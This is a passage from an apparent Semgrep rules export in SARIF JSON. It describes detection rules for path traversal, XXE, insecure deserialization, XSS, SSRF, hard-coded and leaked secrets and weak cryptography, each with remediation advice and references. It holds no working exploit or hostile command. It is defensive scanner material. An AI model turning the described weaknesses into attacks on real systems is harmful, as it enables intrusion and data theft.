[https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.fastapi.file.tainted-path-traversal-toml-fastapi.tainted-path-traversal-toml-fastapi","id":"python.fastapi.file.tainted-path-traversal-toml-fastapi.tainted-path-traversal-toml-fastapi","name":"python.fastapi.file.tainted-path-traversal-toml-fastapi.tainted-path-traversal-toml-fastapi","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.file.tainted-path-traversal-toml-fastapi.tainted-path-traversal-toml-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Use $FORM.cleaned_data[] instead of request.POST[] after form.is_valid() has been executed to only access sanitized data"},"help":{"markdown":"Use $FORM.cleaned_data[] instead of request.POST[] after form.is_valid() has been executed to only access sanitized data\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.django-using-request-post-after-is-valid.django-using-request-post-after-is-valid)\n - [https://docs.djangoproject.com/en/4.2/ref/forms/api/#accessing-clean-data](https://docs.djangoproject.com/en/4.2/ref/forms/api/#accessing-clean-data)\n","text":"Use $FORM.cleaned_data[] instead of request.POST[] after form.is_valid() has been executed to only access sanitized data"},"helpUri":"https://semgrep.dev/r/python.django.security.django-using-request-post-after-is-valid.django-using-request-post-after-is-valid","id":"python.django.security.django-using-request-post-after-is-valid.django-using-request-post-after-is-valid","name":"python.django.security.django-using-request-post-after-is-valid.django-using-request-post-after-is-valid","properties":{"precision":"very-high","tags":["CWE-20: Improper Input Validation","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.django-using-request-post-after-is-valid.django-using-request-post-after-is-valid"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a potentially dynamic ClientTrace. This occurred because semgrep could not find a static definition for '$TRACE'. Dynamic ClientTraces are dangerous because they deserialize function code to run when certain Request events occur, which could lead to code being run without your knowledge. Ensure that your ClientTrace is statically defined."},"help":{"markdown":"Detected a potentially dynamic ClientTrace. This occurred because semgrep could not find a static definition for '$TRACE'. Dynamic ClientTraces are dangerous because they deserialize function code to run when certain Request events occur, which could lead to code being run without your knowledge. Ensure that your ClientTrace is statically defined.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.net.dynamic-httptrace-clienttrace.dynamic-httptrace-clienttrace)\n - [https://github.com/returntocorp/semgrep-rules/issues/518](https://github.com/returntocorp/semgrep-rules/issues/518)\n","text":"Detected a potentially dynamic ClientTrace. This occurred because semgrep could not find a static definition for '$TRACE'. Dynamic ClientTraces are dangerous because they deserialize function code to run when certain Request events occur, which could lead to code being run without your knowledge. Ensure that your ClientTrace is statically defined."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.net.dynamic-httptrace-clienttrace.dynamic-httptrace-clienttrace","id":"go.lang.security.audit.net.dynamic-httptrace-clienttrace.dynamic-httptrace-clienttrace","name":"go.lang.security.audit.net.dynamic-httptrace-clienttrace.dynamic-httptrace-clienttrace","properties":{"precision":"very-high","tags":["CWE-913: Improper Control of Dynamically-Managed Code Resources","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.net.dynamic-httptrace-clienttrace.dynamic-httptrace-clienttrace"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS CloudWatch Log Group has no retention. Missing retention in log groups can cause losing important event information."},"help":{"markdown":"The AWS CloudWatch Log Group has no retention. Missing retention in log groups can cause losing important event information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-cloudwatch-log-group-no-retention.aws-cloudwatch-log-group-no-retention)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"The AWS CloudWatch Log Group has no retention. Missing retention in log groups can cause losing important event information."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-cloudwatch-log-group-no-retention.aws-cloudwatch-log-group-no-retention","id":"terraform.aws.security.aws-cloudwatch-log-group-no-retention.aws-cloudwatch-log-group-no-retention","name":"terraform.aws.security.aws-cloudwatch-log-group-no-retention.aws-cloudwatch-log-group-no-retention","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-cloudwatch-log-group-no-retention.aws-cloudwatch-log-group-no-retention"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS Workspace user volume is unencrypted. The AWS KMS encryption key protects user volume. To create your own, create a aws_kms_key resource or use the ARN string of a key in your account."},"help":{"markdown":"The AWS Workspace user volume is unencrypted. The AWS KMS encryption key protects user volume. To create your own, create a aws_kms_key resource or use the ARN string of a key in your account.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-workspaces-user-volume-unencrypted.aws-workspaces-user-volume-unencrypted)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"The AWS Workspace user volume is unencrypted. The AWS KMS encryption key protects user volume. To create your own, create a aws_kms_key resource or use the ARN string of a key in your account."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-workspaces-user-volume-unencrypted.aws-workspaces-user-volume-unencrypted","id":"terraform.aws.security.aws-workspaces-user-volume-unencrypted.aws-workspaces-user-volume-unencrypted","name":"terraform.aws.security.aws-workspaces-user-volume-unencrypted.aws-workspaces-user-volume-unencrypted","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-workspaces-user-volume-unencrypted.aws-workspaces-user-volume-unencrypted"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Square OAuth Secret detected"},"help":{"markdown":"Square OAuth Secret detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-square-oauth-secret.detected-square-oauth-secret)\n - [https://github.com/Yelp/detect-secrets/blob/master/tests/plugins/square_oauth_test.py](https://github.com/Yelp/detect-secrets/blob/master/tests/plugins/square_oauth_test.py)\n","text":"Square OAuth Secret detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-square-oauth-secret.detected-square-oauth-secret","id":"generic.secrets.security.detected-square-oauth-secret.detected-square-oauth-secret","name":"generic.secrets.security.detected-square-oauth-secret.detected-square-oauth-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-square-oauth-secret.detected-square-oauth-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If unverified user data can reach the `evaluate` method it can result in Server-Side Request Forgery vulnerabilities"},"help":{"markdown":"If unverified user data can reach the `evaluate` method it can result in Server-Side Request Forgery vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.puppeteer.security.audit.puppeteer-evaluate-code-injection.puppeteer-evaluate-code-injection)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"If unverified user data can reach the `evaluate` method it can result in Server-Side Request Forgery vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.puppeteer.security.audit.puppeteer-evaluate-code-injection.puppeteer-evaluate-code-injection","id":"javascript.puppeteer.security.audit.puppeteer-evaluate-code-injection.puppeteer-evaluate-code-injection","name":"javascript.puppeteer.security.audit.puppeteer-evaluate-code-injection.puppeteer-evaluate-code-injection","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.puppeteer.security.audit.puppeteer-evaluate-code-injection.puppeteer-evaluate-code-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"PKCS#1 v1.5 decryption is intrinsically vulnerable to timing attacks. The `pycryptodome` implementation attempts to mitigate the risk with some constant-time constructs, however these are not sufficient by themselves and your use of the library may still be vulnerable. Consult the documentation for the library to understand the risks and how to mitigate them. Alternatively, we recommend to use PKCS#1 OAEP instead for a secure by default implementation."},"help":{"markdown":"PKCS#1 v1.5 decryption is intrinsically vulnerable to timing attacks. The `pycryptodome` implementation attempts to mitigate the risk with some constant-time constructs, however these are not sufficient by themselves and your use of the library may still be vulnerable. Consult the documentation for the library to understand the risks and how to mitigate them. Alternatively, we recommend to use PKCS#1 OAEP instead for a secure by default implementation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pycryptodome.pycryptodome-rsa-pkcs1.pycryptodome-rsa-pkcs1)\n - [https://link.springer.com/chapter/10.1007/BFb0055716](https://link.springer.com/chapter/10.1007/BFb0055716)\n - [https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.186-5.pdf](https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.186-5.pdf)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption](https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption)\n - [https://www.pycryptodome.org/src/cipher/pkcs1_v1_5](https://www.pycryptodome.org/src/cipher/pkcs1_v1_5)\n","text":"PKCS#1 v1.5 decryption is intrinsically vulnerable to timing attacks. The `pycryptodome` implementation attempts to mitigate the risk with some constant-time constructs, however these are not sufficient by themselves and your use of the library may still be vulnerable. Consult the documentation for the library to understand the risks and how to mitigate them. Alternatively, we recommend to use PKCS#1 OAEP instead for a secure by default implementation."},"helpUri":"https://semgrep.dev/r/python.pycryptodome.pycryptodome-rsa-pkcs1.pycryptodome-rsa-pkcs1","id":"python.pycryptodome.pycryptodome-rsa-pkcs1.pycryptodome-rsa-pkcs1","name":"python.pycryptodome.pycryptodome-rsa-pkcs1.pycryptodome-rsa-pkcs1","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.pycryptodome.pycryptodome-rsa-pkcs1.pycryptodome-rsa-pkcs1"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring the SAXBuilder parser with `parser.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `parser.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")`, enabling both of `parser.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` and `parser.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`, and enabling both of `parser.setExpandEntities(false)` and parser.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)` It is also possible to use one of the constructor parameters that will result in a more secure parser by default: `new SAXBuilder(XMLReaders.DTDVALIDATING)` or `new SAXBuilder(XMLReaders.XSDVALIDATING)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring the SAXBuilder parser with `parser.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `parser.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")`, enabling both of `parser.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` and `parser.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`, and enabling both of `parser.setExpandEntities(false)` and parser.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)` It is also possible to use one of the constructor parameters that will result in a more secure parser by default: `new SAXBuilder(XMLReaders.DTDVALIDATING)` or `new SAXBuilder(XMLReaders.XSDVALIDATING)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.xxe.tainted-saxbuilder-xxe-servlet.tainted-saxbuilder-xxe-servlet)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/611.html](https://cwe.mitre.org/data/definitions/611.html)\n - [https://cwe.mitre.org/data/definitions/827.html](https://cwe.mitre.org/data/definitions/827.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring the SAXBuilder parser with `parser.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `parser.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")`, enabling both of `parser.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` and `parser.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`, and enabling both of `parser.setExpandEntities(false)` and parser.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)` It is also possible to use one of the constructor parameters that will result in a more secure parser by default: `new SAXBuilder(XMLReaders.DTDVALIDATING)` or `new SAXBuilder(XMLReaders.XSDVALIDATING)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.servlets.security.xxe.tainted-saxbuilder-xxe-servlet.tainted-saxbuilder-xxe-servlet","id":"java.servlets.security.xxe.tainted-saxbuilder-xxe-servlet.tainted-saxbuilder-xxe-servlet","name":"java.servlets.security.xxe.tainted-saxbuilder-xxe-servlet.tainted-saxbuilder-xxe-servlet","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.xxe.tainted-saxbuilder-xxe-servlet.tainted-saxbuilder-xxe-servlet"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.webrepl.python-webrepl-hardcoded-secret.python-webrepl-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.webrepl.python-webrepl-hardcoded-secret.python-webrepl-hardcoded-secret","id":"python.webrepl.python-webrepl-hardcoded-secret.python-webrepl-hardcoded-secret","name":"python.webrepl.python-webrepl-hardcoded-secret.python-webrepl-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.webrepl.python-webrepl-hardcoded-secret.python-webrepl-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Basic authentication is considered weak and should be avoided. Use a different authentication scheme, such of OAuth2, OpenID Connect, or mTLS."},"help":{"markdown":"Basic authentication is considered weak and should be avoided. Use a different authentication scheme, such of OAuth2, OpenID Connect, or mTLS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.openapi.security.use-of-basic-authentication.use-of-basic-authentication)\n - [https://cwe.mitre.org/data/definitions/287.html](https://cwe.mitre.org/data/definitions/287.html)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design/](https://owasp.org/Top10/A04_2021-Insecure_Design/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/)\n","text":"Basic authentication is considered weak and should be avoided. Use a different authentication scheme, such of OAuth2, OpenID Connect, or mTLS."},"helpUri":"https://semgrep.dev/r/yaml.openapi.security.use-of-basic-authentication.use-of-basic-authentication","id":"yaml.openapi.security.use-of-basic-authentication.use-of-basic-authentication","name":"yaml.openapi.security.use-of-basic-authentication.use-of-basic-authentication","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A04:2021 Insecure Design","OWASP-A07:2021 Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.openapi.security.use-of-basic-authentication.use-of-basic-authentication"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The C implementations of the `pickle` module, called `cPickle` or `_pickle`, are also considered insecure."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The C implementations of the `pickle` module, called `cPickle` or `_pickle`, are also considered insecure.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.deserialization.tainted-pickle-fastapi.tainted-pickle-fastapi)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The C implementations of the `pickle` module, called `cPickle` or `_pickle`, are also considered insecure."},"helpUri":"https://semgrep.dev/r/python.fastapi.deserialization.tainted-pickle-fastapi.tainted-pickle-fastapi","id":"python.fastapi.deserialization.tainted-pickle-fastapi.tainted-pickle-fastapi","name":"python.fastapi.deserialization.tainted-pickle-fastapi.tainted-pickle-fastapi","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.deserialization.tainted-pickle-fastapi.tainted-pickle-fastapi"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `ruamel.yaml` library is a YAML parser that is as powerful as `pickle`, using it to parse untrusted data can lead to object deserialization vulnerabilities. Starting from `ruamel.yaml` version 0.15.0 the default loader (`typ='rt'`) is a direct derivative of the safe loader and so this parser is secure by default. If the usage of an unsafe loader is intentional, then make sure you load data only from trusted sources. If it was not intentional, don't explicitly specify `typ='unsafe'`, to use a safe loader. Before version 0.15.0, use the optional argument `Loader` with value `SafeLoader` or `CSafeLoader`, or use the `safe_load` function."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `ruamel.yaml` library is a YAML parser that is as powerful as `pickle`, using it to parse untrusted data can lead to object deserialization vulnerabilities. Starting from `ruamel.yaml` version 0.15.0 the default loader (`typ='rt'`) is a direct derivative of the safe loader and so this parser is secure by default. If the usage of an unsafe loader is intentional, then make sure you load data only from trusted sources. If it was not intentional, don't explicitly specify `typ='unsafe'`, to use a safe loader. Before version 0.15.0, use the optional argument `Loader` with value `SafeLoader` or `CSafeLoader`, or use the `safe_load` function.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.deserialization.tainted-ruamel-flask.tainted-ruamel-flask)\n - [https://cwe.mitre.org/data/definitions/502.html](https://cwe.mitre.org/data/definitions/502.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://nvd.nist.gov/vuln/detail/CVE-2017-18342](https://nvd.nist.gov/vuln/detail/CVE-2017-18342)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://yaml.readthedocs.io/en/latest/api/](https://yaml.readthedocs.io/en/latest/api/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `ruamel.yaml` library is a YAML parser that is as powerful as `pickle`, using it to parse untrusted data can lead to object deserialization vulnerabilities. Starting from `ruamel.yaml` version 0.15.0 the default loader (`typ='rt'`) is a direct derivative of the safe loader and so this parser is secure by default. If the usage of an unsafe loader is intentional, then make sure you load data only from trusted sources. If it was not intentional, don't explicitly specify `typ='unsafe'`, to use a safe loader. Before version 0.15.0, use the optional argument `Loader` with value `SafeLoader` or `CSafeLoader`, or use the `safe_load` function."},"helpUri":"https://semgrep.dev/r/python.flask.deserialization.tainted-ruamel-flask.tainted-ruamel-flask","id":"python.flask.deserialization.tainted-ruamel-flask.tainted-ruamel-flask","name":"python.flask.deserialization.tainted-ruamel-flask.tainted-ruamel-flask","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.deserialization.tainted-ruamel-flask.tainted-ruamel-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the Castor XML Framework unless you explicitly define permissions for types that are allowed to be deserialized by `Castor`."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the Castor XML Framework unless you explicitly define permissions for types that are allowed to be deserialized by `Castor`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.castor-deserialization-deepsemgrep.castor-deserialization-deepsemgrep)\n - [https://castor-data-binding.github.io/castor/reference-guide/reference/xml/xml-framework.html](https://castor-data-binding.github.io/castor/reference-guide/reference/xml/xml-framework.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the Castor XML Framework unless you explicitly define permissions for types that are allowed to be deserialized by `Castor`."},"helpUri":"https://semgrep.dev/r/java.servlets.security.castor-deserialization-deepsemgrep.castor-deserialization-deepsemgrep","id":"java.servlets.security.castor-deserialization-deepsemgrep.castor-deserialization-deepsemgrep","name":"java.servlets.security.castor-deserialization-deepsemgrep.castor-deserialization-deepsemgrep","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.castor-deserialization-deepsemgrep.castor-deserialization-deepsemgrep"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input. For more information, see: [Go XSS prevention](https://semgrep.dev/docs/cheat-sheets/go-xss/)."},"help":{"markdown":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input. For more information, see: [Go 